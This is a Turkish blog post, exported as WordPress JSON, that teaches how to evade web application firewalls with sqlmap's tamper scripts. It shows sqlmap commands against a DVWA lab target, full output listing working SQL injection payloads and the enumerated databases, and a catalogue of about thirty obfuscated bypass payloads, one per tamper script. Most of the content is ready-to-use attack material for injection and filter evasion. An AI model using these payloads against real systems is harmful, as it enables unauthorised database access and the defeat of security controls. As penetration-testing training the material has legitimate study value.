{"id":544,"date":"2015-08-19T03:42:36","date_gmt":"2015-08-19T00:42:36","guid":{"rendered":"https:\/\/furkansandal.com\/sqlmapi-waf-bypass-scriptleri-ile-kullanma\/"},"modified":"2015-08-19T03:42:36","modified_gmt":"2015-08-19T00:42:36","slug":"sqlmapi-waf-bypass-scriptleri-ile-kullanma","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/sqlmapi-waf-bypass-scriptleri-ile-kullanma\/","title":{"rendered":"SQLmap'i WAF Bypass Scriptleri ile Kullanma"},"content":{"rendered":"
\n
\n<\/div>\n

Hedef sistemde SQL Injection<\/b> g\u00fcvenlik a\u00e7\u0131\u011f\u0131 tespit edilse bile normal \u015fartlarda sqli komutlar\u0131 i\u015flem g\u00f6rm\u00fcyorsa b\u00fcy\u00fck ihtimalle arkada bir WAF(Web Application Firewall) taraf\u0131ndan alg\u0131lan\u0131p engelleniyordur.<\/p>\n

SQL Injection sald\u0131r\u0131lar\u0131nda \u00e7e\u015fitli bypass y\u00f6ntemleri kullan\u0131r\u0131z, \u00f6rne\u011fin;
b\u00fcy\u00fck k\u00fc\u00e7\u00fck harf karma\u015fas\u0131, komutlar\u0131n \u00e7e\u015fitli \u015fifreleme algoritmalar\u0131yla encode etmek gibi..<\/p>\n

SQLmap’in WAF, IPS gibi sald\u0131r\u0131 engelleme sistemlerini bypass etmesi i\u00e7in “tamper script<\/b>” \u00f6zelli\u011fi bulunmaktad\u0131r.<\/p>\n

A\u015fa\u011f\u0131da WAF kullanan bir sisteme SQLmap’in default kullan\u0131m parametresi verilmi\u015ftir ve sonu\u00e7 al\u0131namam\u0131\u015ft\u0131r:<\/p>\n

\nroot@bt:\/pentest\/database\/sqlmap# .\/sqlmap.py -u “http:\/\/1.2.3.4\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit#” –cookie “security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb” –dbs<\/i><\/b>\u00a0<\/p><\/blockquote>\n

\n\u00a0 \u00a0 sqlmap\/1.0-dev-dea6218 – automatic SQL injection and database takeover tool
\u00a0 \u00a0 http:\/\/sqlmap.org\u00a0<\/p><\/blockquote>\n

\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:39:43
[15:39:43] [INFO] testing connection to the target url
[15:39:43] [INFO] heuristics detected web page charset ‘ascii’
[15:39:43] [WARNING] reflective value(s) found and filtering out
[15:39:43] [INFO] heuristic (parsing) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’)
[15:39:43] [INFO] testing for SQL injection on GET parameter ‘id’
[15:39:43] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
[15:39:43] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:44] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:45] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:46] [CRITICAL] unable to connect to the target url or proxy
[15:39:46] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:47] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:48] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request<\/p><\/blockquote>\n

\nG\u00f6r\u00fcld\u00fc\u011f\u00fc gibi hedef sistemde UNION komutu ge\u00e7ti\u011finde istekleri engelleyen bir yap\u0131 bulunmaktad\u0131r..<\/p>\n

\u015eimdi ise bir de SQLmap’i –tamper<\/b> fonksiyonuyla birlikte kullanal\u0131m:<\/p>\n

\nroot@bt:\/pentest\/database\/sqlmap# .\/sqlmap.py -u “http:\/\/1.2.3.4\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit#” –cookie “security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb” –tamper “tamper\/randomcase.py” –dbs<\/i><\/b>\u00a0<\/p><\/blockquote>\n

\n[*] starting at 16:16:24\u00a0<\/p><\/blockquote>\n

\n[16:16:24] [INFO] loading tamper script ‘randomcase’<\/span><\/b>
[16:16:24] [INFO] testing connection to the target url
[16:16:25] [INFO] testing if the url is stable, wait a few seconds
[16:16:26] [INFO] url is stable
[16:16:26] [INFO] testing if GET parameter ‘id’ is dynamic
[16:16:26] [WARNING] GET parameter ‘id’ appears to be not dynamic
[16:16:26] [INFO] heuristics detected web page charset ‘ascii’
[16:16:26] [WARNING] reflective value(s) found and filtering out
[16:16:26] [INFO] heuristic test shows that GET parameter ‘id’ might be injectable (possible DBMS: MySQL)
[16:16:26] [INFO] testing for SQL injection on GET parameter ‘id’
[16:16:26] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[16:16:26] [INFO] GET parameter ‘id’ seems to be ‘AND boolean-based blind – WHERE or HAVING clause’ injectable (with –string=’Surname: admin’)
[16:16:26] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
[16:16:26] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’ injectable
[16:16:26] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[16:16:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0
[16:16:27] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
[16:16:37] [INFO] GET parameter ‘id’ is ‘MySQL > 5.0.11 AND time-based blind’ injectable
[16:16:37] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 20 columns’
[16:16:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[16:16:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:37] [INFO] target url appears to have 2 columns in query
[16:16:37] [INFO] GET parameter ‘id’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:

Place: GET
Parameter: id
\u00a0 \u00a0 Type: boolean-based blind
\u00a0 \u00a0 Title: AND boolean-based blind – WHERE or HAVING clause
\u00a0 \u00a0 Payload: id=1 AND 3106=3106&Submit=Submit
\u00a0 \u00a0 Type: error-based
\u00a0 \u00a0 Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
\u00a0 \u00a0 Payload: id=1 AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x3a72796b3a,(SELECT (CASE WHEN (2385=2385) THEN 1 ELSE 0 END)),0x3a6b6e693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
\u00a0 \u00a0 Type: UNION query
\u00a0 \u00a0 Title: MySQL UNION query (NULL) – 2 columns
\u00a0 \u00a0 Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a72796b3a,0x4f676a51626745675562,0x3a6b6e693a), NULL#&Submit=Submit
\u00a0 \u00a0 Type: AND\/OR time-based blind
\u00a0 \u00a0 Title: MySQL > 5.0.11 AND time-based blind
\u00a0 \u00a0 Payload: id=1 AND SLEEP(5)&Submit=Submit

[16:16:41] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[16:16:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[16:16:41] [INFO] fetching database names
available databases [7]:
[*] beyazsapka
[*] dvwa
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] yenibir_siparis
[16:16:41] [INFO] fetched data logged to text files under ‘\/pentest\/database\/sqlmap\/output\/192.168.1.127’
[*] shutting down at 16:16:41<\/p><\/blockquote>\n

\nG\u00f6r\u00fcld\u00fc\u011f\u00fc gibi hedef sistemdeki koruyucu mekanizma atlat\u0131lm\u0131\u015f oldu..<\/p>\n

SQLmap’in y\u00fckl\u00fc oldu\u011fu dizinde “tamper<\/b>” isimli klas\u00f6rde \u00e7e\u015fitli bypass scriptleri bulunmaktad\u0131r. Biz yukardaki testte “tamper” klas\u00f6r\u00fcn\u00fcn i\u00e7inde “randomcase.py<\/b>” scriptinden faydaland\u0131k. Bu scriptin g\u00f6revi UNION gibi sql komutlar\u0131n\u0131 rastgele b\u00fcy\u00fck-k\u00fc\u00e7\u00fck harf \u015feklinde d\u00fczenleyerek kar\u015f\u0131 sisteme yollar ve WAF var ise bypass etmi\u015f olur.<\/p>\n

A\u015fa\u011f\u0131da tamper klas\u00f6r\u00fcnde bulunan di\u011fer bypass scriptlerinin isimleri, bypass y\u00f6ntemleri ve hangi veritaban\u0131 platformlar\u0131nda i\u015flevi oldu\u011funu payla\u015ft\u0131m:<\/p>\n

apostrophemask.py (UTF-8)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: AND ‘1’=’1′<\/b>
* Bypass Komutu: \u00a0AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87<\/b><\/p>\n

apostrophenullencode.py (unicode)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: AND ‘1’=’1′<\/b>
* Bypass Komutu: \u00a0AND %271%27=%271%27<\/b><\/p>\n

appendnullbyte.py ()<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: AND 1=1<\/b>
* Bypass Komutu: \u00a0AND 1=1<\/b>
Platform:
* Microsoft Access<\/p>\n

base64encode.py (base64)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1′ AND SLEEP(5)#<\/b>
* Bypass Komutu: \u00a0MScgQU5EIFNMRUVQKDUpIw==<\/b><\/p>\n

between.py (\u201cnot between\u201d \u201c>\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: ‘A > B’<\/b>
* Bypass Komutu: \u00a0‘A NOT BETWEEN 0 AND B’<\/b><\/p>\n

bluecoat.py (\u201clike\u201d \u201c=\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT id FROM users where id = 1<\/b>
* Bypass Komutu: \u00a0SELECT%09id FROM users where id LIKE 1<\/b>
Platform:
* MySQL 5.1, SGOS<\/p>\n

chardoubleencode.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE<\/b>
* Bypass Komutu: \u00a0%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545<\/b><\/p>\n

charencode.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE<\/b>
* Bypass Komutu: \u00a0%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45<\/b><\/p>\n

charunicodeencode.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT FIELD%20FROM TABLE<\/b>
* Bypass Komutu: \u00a0%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′<\/b>
Platform:
* ASP
* ASP.NET<\/p>\n

equaltolike.py (\u201clike\u201d \u201c=\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT * FROM users WHERE id=1<\/b>
* Bypass Komutu: \u00a0SELECT * FROM users WHERE id LIKE 1<\/b><\/p>\n

halfversionedmorekeywords.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: value‘ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa<\/b>
* Bypass Komutu: \u00a0value‘\/*!0UNION\/*!0ALL\/*!0SELECT\/*!0CONCAT(\/*!0CHAR(58,107,112,113,58),\/*!0IFNULL(CAST(\/*!0CURRENT_USER()\/*!0AS\/*!0CHAR),\/*!0CHAR(32)),\/*!0CHAR(58,97,110,121,58)), NULL, NULL#\/*!0AND ‘QDWa’=’QDWa<\/b>
Platform:
* MySQL < 5.1<\/p>\n

ifnull2ifisnull.py (\u201cIF(ISNULL(A), B, A)\u201d \u201cIFNULL(A, B)\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: IFNULL(1, 2)<\/b>
* Bypass Komutu: \u00a0IF(ISNULL(1), 2, 1)<\/b>
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)<\/p>\n

modsecurityversioned.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 AND 2>1–<\/b>
* Bypass Komutu: \u00a01 \/*!30000AND 2>1*\/–<\/b>
Platform:
* MySQL<\/p>\n

modsecurityzeroversioned.py (\u201c0000\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 AND 2>1–<\/b>
* Bypass Komutu: \u00a01 \/*!00000AND 2>1*\/–<\/b>
Platform:
* MySQL<\/p>\n

multiplespaces.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: UNION SELECT<\/b>
* Bypass Komutu: \u00a0 UNION \u00a0 SELECT<\/b><\/p>\n

nonrecursivereplacement.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 UNION SELECT 2–<\/b>
* Bypass Komutu: \u00a01 UNUNIONION SELSELECTECT 2–<\/b><\/p>\n

percentage.py (\u201c%\u201d)<\/b><\/span>
\u00d6rnek:
* Orjinal Komut: SELECT FIELD FROM TABLE<\/b>
* Bypass Komutu: \u00a0%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E<\/b>
Platform:
* ASP<\/p>\n

randomcase.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: INSERT<\/b>
* Bypass Komutu: \u00a0InsERt<\/b><\/p>\n

randomcomments.py<\/span><\/b>
\u00d6rnek:
‘INSERT’ becomes ‘IN\/**\/S\/**\/ERT’<\/b><\/p>\n

securesphere.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: AND 1=1<\/b>
* Bypass Komutu: \u00a0AND 1=1 and ‘0having’=’0having’<\/b><\/p>\n

sp_password.py (\u201csp_password\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 AND 9227=9227–<\/b>
* Bypass Komutu: \u00a01 AND 9227=9227–sp_password<\/b>
Platform:
* MSSQL<\/p>\n

space2comment.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT id FROM users<\/b>
* Bypass Komutu: \u00a0SELECT\/**\/id\/**\/FROM\/**\/users<\/b><\/p>\n

space2dash.py (\u201c–\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 AND 9227=9227<\/b>
* Bypass Komutu: \u00a01–PTTmJopxdWJ%0AAND–cWfcVRPV%0A9227=9227<\/b>
Platform:
* MSSQL
* SQLite<\/p>\n

space2hash.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 AND 9227=9227<\/b>
* Bypass Komutu: \u00a01%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227<\/b>
Platform:
* MySQL<\/p>\n

space2morehash.py<\/span><\/b>
Platform:
* MySQL >= 5.1.13<\/p>\n

space2mssqlblank.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT id FROM users<\/b>
* Bypass Komutu: \u00a0SELECT%08id%02FROM%0Fusers<\/b>
Platform:
* Microsoft SQL Server<\/p>\n

space2mssqlhash.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 AND 9227=9227<\/b>
* Bypass Komutu: \u00a01%23%0A9227=9227<\/b>
Platform:
* MSSQL
* MySQL<\/p>\n

space2mysqlblank.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT id FROM users<\/b>
* Bypass Komutu: \u00a0SELECT%0Bid%0BFROM%A0users<\/b>
Platform:
* MySQL<\/p>\n

space2mysqldash.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 AND 9227=9227<\/b>
* Bypass Komutu: \u00a01–%0AAND–%0A9227=9227<\/b>
Platform:
* MySQL
* MSSQL<\/p>\n

space2plus.py (\u201c+\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT id FROM users<\/b>
* Bypass Komutu: \u00a0SELECT+id+FROM+users<\/b><\/p>\n

space2randomblank.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: SELECT id FROM users<\/b>
* Bypass Komutu: \u00a0SELECTridtFROMnusers<\/b><\/p>\n

unionalltounion.py (\u201cunion all\u201d \u201cunion\u201d)<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: -1 UNION ALL SELECT<\/b>
* Bypass Komutu: \u00a0-1 UNION SELECT<\/b><\/p>\n

unmagicquotes.py (\u201c%bf%27\u201d \u201c–\u201d)<\/b><\/span>
\u00d6rnek:
* Orjinal Komut: 1′ AND 1=1<\/b>
* Bypass Komutu: \u00a01%bf%27 AND 1=1–%20<\/b><\/p>\n

versionedkeywords.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#<\/b>
* Bypass Komutu: \u00a01\/*!UNION*\/\/*!ALL*\/\/*!SELECT*\/\/*!NULL*\/,\/*!NULL*\/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()\/*!AS*\/\/*!CHAR*\/),CHAR(32)),CHAR(58,100,114,117,58))#<\/b>
Platform:
* MySQL<\/p>\n

versionedmorekeywords.py<\/span><\/b>
\u00d6rnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#<\/b>
* Bypass Komutu: \u00a01\/*!UNION*\/\/*!ALL*\/\/*!SELECT*\/\/*!NULL*\/,\/*!NULL*\/,\/*!CONCAT*\/(\/*!CHAR*\/(58,122,114,115,58),\/*!IFNULL*\/(CAST(\/*!CURRENT_USER*\/()\/*!AS*\/\/*!CHAR*\/),\/*!CHAR*\/(32)),\/*!CHAR*\/(58,115,114,121,58))#<\/b>
Platform:
* MySQL >= 5.1.13<\/p>\n

\u0130yi \u00e7al\u0131\u015fmalar..<\/i>\n<\/p>\n<\/div>\n

\nFurkan SANDAL<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Hedef sistemde SQL Injection g\u00fcvenlik a\u00e7\u0131\u011f\u0131 tespit edilse bile normal \u015fartlarda sqli komutlar\u0131 i\u015flem g\u00f6rm\u00fcyorsa b\u00fcy\u00fck ihtimalle arkada bir WAF(Web…<\/p>\n","protected":false},"author":1,"featured_media":469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[78,76,88,89,26,83,81,79,82,77,80,84,85,87,86],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/ssh.jpg?fit=500%2C500&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-8M","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/544"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=544"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/544\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/469"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=544"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}